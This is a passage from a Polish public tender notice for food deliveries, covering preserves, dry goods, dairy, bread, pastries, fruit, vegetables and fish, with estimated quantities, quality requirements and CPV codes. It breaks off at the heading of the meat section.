4	Chrzan tarty na kwasku cytrynowym	150-300g	kg	30,00				
5	Ćwikła z chrzanem	250-500g	kg	10,00				
6	Dżemy owocowe niskosłodzone z kawałkami owoców (różne smaki)
 min. 40g owoców na 100g produktu	250-350g	kg	75,00				
7	Fasola czerwona, biała konserwowa - masa netto bez zalewy	200-500g	kg	12,00				
8	Fasola szparagowa konserwowa - masa netto             bez zalewy	200-1000g	kg	35,00				
9	Groszek konserwowy - masa netto bez zalewy	200-500g	kg	65,00				
10	Ketchup łagodny minimum 55% przecieru pomidorowego	250-1000g	kg	95,00				
11	Koncentrat pomidorowy 30%	800-1000g	kg	75,00				
12	Koncentrat pomidorowy 30%	180-200g	kg	30,00				
13	Koncentrat buraczany płynny min.12% soku                    z buraków	180-500g	kg	9,00				
14	Krem czekoladowy do smarowania z dodatkiem orzechów- nie więcej niż 34g tłuszczu na 100g produktu	180-400g	kg	15,00				
15	Kukurydza konserwowa - masa netto bez zalewy	200-500g	kg	9,00				
16	Miód naturalny	200-500g	kg	22,00				
17	Musztarda delikatesowa	800-1000g	kg	80,00				
18	Musztarda delikatesowa	150-250g	kg	35,00				
19	Ocet spirytusowy 10% kwasowości 	0,5l	l	55,00				
20	Ogórki konserwowe całe - masa netto bez zalewy	900-1000g	kg	120,00				
21	Olej uniwersalny rzepakowy niskoerukowy	0,9- 1l	l	370,00				
22	Olej słonecznikowy	0,5-1,0l	l	8,00				
23	Papryka konserwowa, słodka płaty - masa netto         bez zalewy	500-1000g	kg	6,00				
24	Powidła śliwkowe- min 150g owoców na 100g produktu	280-500g	kg	45,00				
25	Przyprawa do zup w płynie	900-1000ml	l	210,00				
26	Seler konserwowy, nitki - masa netto bez zalewy	280-500g	kg	8,00				
27	Sos słodko kwaśny, chiński, meksykański, itp. z kawałkami warzyw	300-600g	kg	16,00				
28	Zaprawa cytrynowa min. 40% soku z cytryny	0,5-1l	l	220,00				
29	Majonez dekoracyjny sałatkowy	180-400g	kg	40,00				
30	Majonez dekoracyjny sałatkowy	800-1000g	kg	70,00				
II	Konserwy mięsne
1	Mielonka konserwowa - turystyczna, tyrolska itp. -min. 55% mięsa	100-300g	kg	40,00				
2	Szynka konserwowa wieprzowa  min. 60% mięsa	100-300g	kg	16,00				
3	Szynka konserwowa drobiowa  min. 59% mięsa	100-300g	kg	16,00				
4	Pasztet drobiowy smakowy  min. 33% mięsa	100-200g	kg	12,00				
5	Pasztet drobiowy  min 33% mięsa	160g	kg	35,00				
6	Pasztet wieprzowy  min 33% mięsa	100-300g	kg	85,00				
Razem			


III	Bakalie
1	Rodzynki	100g-500g	kg	2,00				
2	Kokos - wiórki	100g-500g	kg	0,50				
3	Orzechy włoskie łuskane	100g-500g	kg	1,50				

Wymagania jakościowe dla przetworów spożywczych  
                                                                                     
Artykuły spożywcze winny być dostarczane w czystych, nieuszkodzonych mechanicznie, szczelnie zamkniętych opakowaniach. Produkty nie mogą wykazywać objawów psucia, pleśni, obcych zapachów. Nie dopuszcza się produktów potłuczonych, połamanych, pogniecionych oraz z kończącym się terminem przydatności do spożycia.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15131000-5,
                    15330000-0,
                    15410000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>DOSTAWA ARTYKUŁÓW SYPKICH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Nazwa artykułu	Sugerowana wielkość
                             opakowania	    Jm	Orientacyjna           ilość                                            zamówienia*
    

1	Budyń - różne smaki (bez  cukru)	1000g	kg	30,00
2	Budyń - różne smaki (bez  cukru)	35-60g	kg	7,00
3	Bulion grzybowy (sypki)	500-1000g	kg	2,50
4	Cukier kryształ	1000g	kg	1620,00
5	Cukier wanilinowy	10-50g	kg	1,00
6	Cynamon mielony	10-20g	kg	0,40
7	Czosnek granulowany, polski	10-20g	kg	9,00
8	Galaretka owocowa - różne smaki	75-100g	kg	22,00
9	Gałka muszkatołowa, mielona	10-20g	kg	0,20
10	Herbata expresowa owocowa, różne smaki, a20 szt	30-40g	kg	1,00
11	Herbata expresowa czarna a100 szt.	100-150g	kg	65,00
12	Herbata expresowa ziołowa  a20 szt (mięta, melisa, rumianek)	30-40g	kg	0,50
13	Imbir mielony	10  20g	kg	0,10
14	Kakao naturalne ciemne (tłuszcz kakaowy min. 12%)	100-200g	kg	4,50
15	Kasza gryczana, cała	500-1000g	kg	35,00
16	Kasza jęczmienna , średnia	500-1000g	kg	70,00
17	Kasza manna	500-1000g	kg	70,00
18	Kaszka mleczno - ryżowa (smakowa)	230g	kg	10,00
19	Kawa naturalna mielona 100%	250g-500g	kg	35,00
20	Kawa zbożowa	200-500g	kg	30,00
21	Kleik ryżowy	160-200g	kg	7,00
22	Kminek	10-20g	kg	0,30
23	 Kwasek cytrynowy	10-20g	kg	0,70
24	 Liść laurowy	5-20g	kg	0,40
25	Majeranek	5-20g	kg	1,20
26	Makaron 4 jajeczny - łazanki #	250-1000g	kg	30,00
27	Makaron 4 jajeczny  
nitki #	250-1000g	kg	80,00
28	Makaron 4 jajeczny - kolanka, rurki, muszelki, świderki #	250-1000g	kg	140,00
29	Mąka pszenna poznańska	1000g	kg	380,00
30	Mąka ziemniaczana	1000g	kg	250,00
31	Mąka żytnia żurek	1000g	kg	25,00
32	Papryka słodka mielona	10-20g	kg	3,50
33	Pieprz czarny mielony	10-20g	kg	4,00
34	Płatki kukurydziane smakowe	500-1000g	kg	22,00
35	Płatki owsiane	500g	kg	25,00
36	Proszek do pieczenia	15-50g	kg	0,50
37	Płatki ryżowe	200-500g	kg	25,00
38	Przyprawa warzywna do potraw	75-200g	kg	22,00
39	Rosół drobiowy (sypki)	500-3000g	kg	35,00
40	Ryż biały	1000g	kg	150,00
41	Sos biały	25-50g	kg	2,50
42	Sos pieczeniowy ciemny	25-50g	kg	6,50
43	Sos sałatkowy - różne smaki	8-20g	kg	0,70
44	Sól spożywcza jodowana	1000g	kg	200,00
45	Sucharki	280-300g	kg	6,00
46	Ziele angielskie	10-20g	kg	0,70
47	Żelatyna spożywcza wieprzowa	50g	kg	6,50

Wymagania jakościowe dla artykułów sypkich   
                                                                                                                                                       Artykuły sypkie winny być dostarczane w czystych, nieuszkodzonych mechanicznie, szczelnie zamkniętych opakowaniach. Produkty nie mogą wykazywać objawów psucia, pleśni, uszkodzenia, obcych zapachów. Powinny posiadać swoisty zapach. Nie dopuszcza się produktów zmoczonych, pogniecionych, nadmiernie zbrylonych oraz z kończącym się terminem przydatności do spożycia.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15600000-4,
                    15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>DOSTAWA ARTYKUŁÓW NABIAŁOWYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna  ilość zamówienia*

1	Deser wielosmakowy: ryżowy, z kaszą manną 	120-200g	kg	90,00
2	Deser wielosmakowy z bitą śmietaną na bazie budyniu,  twarożku 	120-200g	kg	130,00
3	 Jogurt owocowy, z kawałkami owoców	115-200g	kg	330,00
4	Jogurt naturalny do 5g tłuszczu na 100g produktu	150-200g	kg	130,00
5	Jogurt pitny 	150-250g	kg	135,00
6	Maślanka naturalna karton	1l	l	350,00
7	Maślanka owocowa	250-300g	kg	140,00
8	Kefir naturalny	150-250g	kg	50,00
9	Kluski na parze	300-1000g	kg	60,00
10	Margaryna do smarowania pieczywa z dodatkiem masła 	400-500g	kg	8,00
11	Margaryna mleczna, zwykła 	250g	kg	165,00
12	Masło  min. 82% tłuszczu mlecznego	200g	kg	950,00
13	Mix tłuszczowy do smarowania min. 75% tłuszczu( zawartość tłuszczu mlecznego min. 12%	200-250g 	kg	100,00
14	Mleko 2%  	5-20l	l	6500,00
15	Mleko 2%  	1l	l	300,00
16	Ser biały półtłusty - krajanka	kg	kg	320,00
17	Ser podpuszczkowy pleśniowy 	100-200g	kg	12,00
18	Ser domowy z kminkiem	150-200g	kg	110,00
19	Ser wielosmakowy fromage	75-100g	kg	75,00
20	Ser żółty łagodny 45%	1000-3000g	kg	90,00
21	Ser żółty wędzony	1000-2000g	kg	12,00
22	Serek topiony kremowy kostka, 27% tłuszczu pochodzenia zwierzęcego  różne smaki 	100g	kg	100,00
23	Serek topiony kremowy wędzony 	1000-2000g	kg	65,00
24	Serek homogenizowany  różne smaki	100-200g	kg	280,00
25	Serek naturalny homogenizowany	100-200g	kg	80,00
26	Serek kanapkowy twarożkowy, kremowy  różne smaki	100-150g	kg	80,00
27	Serek twarożkowy wiejski ziarnisty	200g	kg	170,00
28	Śmietanka do kawy 10%	10g	szt	1500,00
29	Śmietana spożywcza słodka 18% 	250-500ml	l	210,00
30	Śmietana 12% homogenizowana 	180-400g	kg	12,00
31	Śmietana 30% kremówka	200-500g	kg	12,00
32	Smalec wieprzowy kostka 	200-250g	kg	25,00
33	Drożdże piekarnicze świeże	42-100g	kg	3,00


Wymagania jakościowe dla artykułów nabiałowych
                                                                                                                                                            Artykuły nabiałowe winny być dostarczane świeże, odpowiadające przyjętym normom, w czystych, nieuszkodzonych mechanicznie, szczelnie zamkniętych opakowaniach. Produkty nie mogą wykazywać objawów psucia, pleśni. Powinny posiadać swoisty dla danego produktu zapach i smak - nie dopuszcza się towarów o skwaśniałym, obcym zapachu i smaku. Nie będą uznawane wyroby seropodobne oraz towary z kończącym się terminem przydatności do spożycia.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15500000-3,
                    15400000-2,
                    15898000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>DOSTAWA PIECZYWA<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>L.p	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna
                                                           ilość zamówienia*

1	Chleb pszenno-żytni  krojony	900-1000g	kg	7150,00
2	Chleb wielosmakowy - krojony (słonecznikowy, sojowy, graham,  cebulowy, razowy itp.) bez sztucznych barwników	400 - 500g	kg	720,00
3	Wek krojony	300-500g	kg	110,00
4	Bułka kajzerka	50g	kg	820,00
5	Pieczywo mleczne (rogal, chałka )	50-100g	kg	55,00
6	Bułka mleczna  	50-80g	kg	75,00
7	Bułka tarta	400-500g 	kg	130,00

Wymagania jakościowe dla pieczywa

Pieczywo winno być dostarczane świeże, dobrze wyrośnięte, o barwie złocistej po jasnobrązową. Skórka ściśle połączona z miękiszem. Produkty nie mogą wykazywać objawów psucia, pleśni. Powinny posiadać smak i zapach charakterystyczny dla danego asortymentu. Nie dopuszcza się pieczywa: zdeformowanego, uszkodzonego mechanicznie, o oddzielającym się od miękiszu, zabrudzonej lub spalonej skórce, niedopieczonego, z zakalcem, kruszącego się, z obecnością grudek mąki (lub grudek innych surowców), o gorzkim, zbyt kwaśnym, zbyt słonym, niesłonym lub innym obcym smaku (stęchłym, mdłym).


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15810000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>DOSTAWA WYPIEKÓW CUKIERNICZYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*

1	Rogalik z różnymi nadzieniami	70-100g	kg	90,00
2	Rogalik z różnymi nadzieniami z ograniczoną ilością cukru	70-100g	kg	30,00
3	Drożdżówka wielosmakowa (ser, mak,                      marmolada itp. )	60-120g	kg	80,00
4	Drożdżówka z ograniczoną ilością cukru	60-120g	kg	25,00
5	Jagodzianka	70 -100g	kg	80,00
6	Jagodzianka z ograniczoną ilością cukru	70-100g	kg	25,00
7	Pączek z różnym nadzieniem (śmietana, marmolada, budyń, adwokat itp.)	70 - 100g	kg	100,00
8	Pączek z ograniczoną ilością cukru, bez polewy	70 - 100g	kg	30,00
9	Ciasto tortowe z kremem (na bazie budyniu)                    z owocami i galaretką owocową	 	kg	70,00
10	Ciastka w-z	80-100g	kg	20,00
11	Sernik na drożdżowym spodzie	 	kg	90,00
12	Ciasto drożdżowe z posypką	 	kg	20,00
13	Ciasto z owocami na drożdżowym spodzie	 	kg	80,00
14	Ciasto z owocami na piaskowym spodzie		kg	100,00
15	Szarlotka	 	kg	80,00
16	Sernik na cieście ucieranym	 	kg	80,00
17	Rolada z bitą śmietaną	 	kg	40,00
18	Ptysie miniaturki nadziewane śmietaną, budyniem itp.	 	kg	10,00
19	Kokosanki	 	kg	30,00
20	Piernik z bakaliami w czekoladzie	 	kg	20,00
21	Faworki		kg	5,00
22	Pączki "mini"	 	kg	5,00
23	Babeczki piaskowe	50-100g	kg	100,00


Wymagania jakościowe dla wypieków cukierniczych

Wypieki cukiernicze winny być dostarczane świeże, charakteryzujące się smakiem i zapachem swoistym dla danego asortymentu. Produkty nie mogą wykazywać objawów psucia, pleśni. Nie dopuszcza się wypieków zdeformowanych, uszkodzonych mechanicznie, zabrudzonych lub spalonych, niedopieczonych, niewyrośniętych, z zakalcem, nadmiernie kruszących się, z obecnością grudek mąki (lub grudek innych surowców), o obcym smaku (stęchłym lub mdłym).

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15810000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>DOSTAWA WARZYW ŚWIEŻYCH I SUSZONYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*

1	Buraki	 	kg	350,00
2	Botwinka	 	kg	20,00
3	Brokuły - różyczka	 	kg	4,00
4	Cebula	 	kg	260,00
5	Cebulka zielona, szczypiorek (I-IV)	 	kg	25,00
6	Cebulka zielona (V-VI)	 	kg	15,00
7	Czosnek polski	 	kg	16,00
8	Kalafior - różyczka	 	kg	10,00
9	Kalarepa	 	kg	45,00
10	Kapusta biała	 	kg	400,00
11	Kapusta biała młoda	 	kg	130,00
12	Kapusta czerwona	 	kg	280,00
13	Kapusta czerwona młoda	 	kg	50,00
14	Kapusta kiszona	 	kg	400,00
15	Kapusta pekińska	 	kg	70,00
16	Kapusta włoska	 	kg	70,00
17	Kapusta włoska młoda	 	kg	20,00
18	Koperek zielony (I-IV)	 	kg	35,00
19	Koperek zielony (V-VI)	 	kg	20,00
20	Ogórki kiszone	 	kg	90,00
21	Ogórki małosolne	 	kg	30,00
22	Ogórki zielone  (I-V)	 	kg	30,00
23	Ogórki zielone (VI)	 	kg	30,00
24	Papryka czerwona	 	kg	18,00
25	Pieczarki	 	kg	150,00
26	Pietruszka korzeń	 	kg	400,00
27	Pietruszka zielona  (I-IV)	 	kg	45,00
28	Pietruszka zielona (V-VI)	 	kg	30,00
29	Pomidory  (I-V)	 	kg	155,00
30	Pomidory (VI)	 	kg	80,00
31	Por	 	kg	90,00
32	Rzodkiewka  (I-IV)	100g	pęczek	40,00
33	Rzodkiewka (V-VI)	100g	pęczek	30,00
34	Sałata zielona  (I-IV)	200g	szt.	5,00
35	Sałata zielona (V-VI)	300g	szt.	110,00
36	Seler korzeń	 	kg	450,00
37	Marchew	 	kg	1 250,00
38	Ziemniaki	 	kg	10 000,00
39	Ziemniaki młode	 	kg	1 500,00
40	Fasola kolorowa	 	kg	30,00
41	Fasola Jaś	 	kg	35,00
42	Groch łuszczony	 	kg	30,00
43	Grzyby suszone	 	kg	0,50

Wymagania jakościowe dla warzyw świeżych i suszonych 

Dostarczane warzywa muszą być zdrowe, świeże, czyste, praktycznie wolne od szkodników i uszkodzeń miąższu. Powinny charakteryzować się smakiem i zapachem swoistym dla danego asortymentu. Nie dopuszcza się produktów gnijących, nadmiernie zawilgoconych lub z objawami zepsucia, pleśni, obicia. 
Warzywa suszone dostarczane powinny być w odpowiednio zabezpieczonych opakowaniach. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03000000-1, 03200000-3,
                    15331135-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>DOSTAWA OWOCÓW ŚWIEŻYCH <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*

1	Arbuz		kg	80,00
2	Banany	200g/szt	kg	950,00
3	Brzoskwinie	150g/szt	kg	20,00
4	Czereśnie		kg	30,00
5	Grapefruity	300-350g/szt	kg	100,00
6	Jabłka		kg	850,00
7	Jabłka deserowe	200g/szt	kg	500,00
8	Jagody		kg	6,00
9	Mandarynki	80-100g/szt	kg	350,00
10	Nektaryny	150g/szt	kg	20,00
11	Owoce kiwi	100-120g/szt	kg	75,00
12	Pomarańcze	200 - 250g/szt	kg	750,00
13	Truskawki		kg	360,00
14	Winogrona deserowe		kg	25,00
15	Rabarbar		kg	270,00

Wymagania jakościowe dla owoców świeżych

Dostarczane owoce muszą być zdrowe, świeże, czyste, praktycznie wolne od szkodników i uszkodzeń miąższu. Powinny charakteryzować się smakiem i zapachem swoistym dla danego asortymentu. Nie dopuszcza się produktów gnijących, nadmiernie zawilgoconych lub z objawami zepsucia, pleśni, obicia.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03000000-1, 03200000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>DOSTAWA WARZYW I OWOCÓW MROŻONYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia*

1	Brokuły 	400-450g	kg	10,00
2	Brokuły 	2000-2500g	kg	70,00
3	Brukselka	400-450g	kg	5,00
4	Brukselka	2000-2500g	kg	50,00
5	Fasolka szparagowa zielona, cięta	400-450g	kg	10,00
6	Fasolka szparagowa zielona, cięta	2000-2500g	kg	30,00
7	Kalafior	400-450g	kg	10,00
8	Kalafior	2000-2500g	kg	85,00
9	Mieszanka kompotowa 
(wiśnia, aronia, czarna porzeczka, 
śliwka, truskawka)	400-450g	kg	20,00
10	Mieszanka kompotowa 
(wiśnia, aronia, czarna porzeczka, 
śliwka, truskawka)	2000-2500g	kg	540,00
11	Szpinak drobnorozdrobniony 	400-450g	kg	10,00
12	Szpinak drobnorozdrobniony 	2000-2500g	kg	140,00
13	Truskawki	400-450g	kg	5,00
14	Truskawki	2000-2500g	kg	40,00

Wymagania jakościowe dla owoców i warzyw mrożonych

Produkty mrożone winny być dostarczane w czystych, nieuszkodzonych, szczelnie zamkniętych opakowaniach. Produkty te muszą być oznakowane zgodnie z obowiązującymi normami. Nie mogą wykazywać cech przerwania łańcucha chłodniczego, nie mogą być rozmrożone. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15330000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>DOSTAWA RYB MROŻONYCH, WĘDZONYCH I PRZETWORÓW RYBNYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia*

1	Filety z zielonego śledzia		kg	90,00
2	Filety z tilapii b/s, zawartość glazury do 20%		kg	120,00
3	Filet z morszczuka, b/s, płaty SHP		kg	90,00
4	Filety z dorsza płaty b/skóry ,SHP		kg	30,00
5	Filet z pangi trymowanej płaty, SHP		kg	220,00
6	Filety z matiasa b/skóry solone(masa netto bez zalewy)	1000-4000g	kg	100,00
7	Filety z matiasa b/skóry solone(masa netto bez zalewy)	100-900g	kg	10,00
8	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	1000-4000g	kg	30,00
9	Filety śledziowe w oleju z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	10,00
10	Sałatka z filetów śledziowych w majonezie	1000-4000g	kg	45,00
11	Sałatka z filetów śledziowych w majonezie	100-900g	kg	5,00
12	Sałatka-krajanka z filetów śledziowych w oleju z różnymi dodatkami (masa netto bez zalewy)	1000-4000g	kg	45,00
13	Sałatka-krajanka z filetów śledziowych w oleju                                   z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	5,00
14	Koreczki śledziowe z różnymi dodatkami (masa netto bez zalewy)	1000-4000g	kg	30,00
15	Koreczki śledziowe z różnymi dodatkami (masa netto bez zalewy)	100-900g	kg	5,00
16	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	1000-4000g	kg	25,00
17	Klopsy rybne opiekane w zalewie (masa netto bez zalewy)	100-900g	kg	5,00
18	Pasty rybne(z makreli, tuńczyka, łososia itp.)	1000-4000g	kg	40,00
19	Pasty rybne(z makreli, tuńczyka, łososia itp.)	50-500g	kg	10,00
20	Płaty śledziowe marynowane (masa netto bez zalewy)	1000-4000g	kg	45,00
21	Płaty śledziowe marynowane (masa netto bez zalewy)	100-900g	kg	5,00
22	Makrela wędzona ( tusze)		kg	210,00
23	Szproty wędzone		kg	6,00
24	Paprykarz #	100-400g	kg	50,00
25	Szproty w oleju min 65% mięsa rybnego	150-200g	kg	55,00
26	Tuńczyk w oleju - kawałki min. 70% mięsa rybnego	150-200g	kg	30,00
27	Śledzie w oleju  o zawartości min. 60% mięsa rybnego	150-200g	kg	30,00
28	Śledzie w pomidorach  o zawartości min.                             50% mięsa rybnego	150-200g	kg	30,00
29	Ryba w galarecie min. 30 % mięsa rybnego	150-200g	kg	35,00


Wymagania jakościowe dla ryb mrożonych, wędzonych i przetworów rybnych

Produkty mrożone winny być dostarczane w czystych, nieuszkodzonych, zamkniętych opakowaniach. Muszą być oznakowane zgodnie z obowiązującymi normami. Nie mogą wykazywać cech przerwania łańcucha chłodniczego, nie mogą być rozmrożone. Filety po rozmrożeniu powinny być całe, bez obcych zanieczyszczeń, na skórze może występować przezroczysty śluz. Powierzchnie cięć gładkie, bez poszarpanych krawędzi, bez pozostałości wnętrzności. Produkty powinny charakteryzować się swoistym zapachem  niedopuszczalny jest jełki, gorzki, kwaśny lub obcy zapach.  Nie będzie uznawany towar z oznakami zepsucia oraz z kończącym się terminem przydatności do spożycia.
Tusze ryb wędzonych powinny być całe, bez obcych zanieczyszczeń; jędrne, równomiernie wywędzone; mięso soczyste i delikatne.
Przetwory rybne winny być dostarczane w czystych, nieuszkodzonych, szczelnie zamkniętych opakowaniach. Produkty nie mogą wykazywać oznak zepsucia po otwarciu opakowania.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15200000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>DOSTAWA MIĘSA WIEPRZOWEGO I WOŁOWEGO ORAZ PODROBÓW<br /><div style="padding-left: 20px"><b>
